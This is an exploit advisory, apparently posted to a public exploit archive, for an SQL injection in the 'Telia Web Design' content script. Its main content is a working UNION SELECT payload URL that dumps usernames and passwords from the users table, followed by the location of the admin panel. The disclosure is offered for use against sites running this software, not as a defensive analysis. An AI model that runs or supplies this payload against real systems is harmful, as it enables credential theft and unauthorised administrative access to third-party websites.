1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
------------------------------------------------------------------------------------------- Telia Web Design (index.php) SQL Injection Vulnerability ------------------------------------------------------------------------------------------- Author: CoBRa_21 Mail: uyku_cu@windowslive.com Script Home: http://www.telia.co.gr/ ------------------------------------------------------------------------------------------- Sql Injection: http://localhost/[path]/index.php?module=content&action=article&id=-80/**/union/**/select/**/group_concat(username,0x3a,password),2/**/from/**/users Admin Panel http://localhost/[path]/admin ------------------------------------------------------------------------------------------- |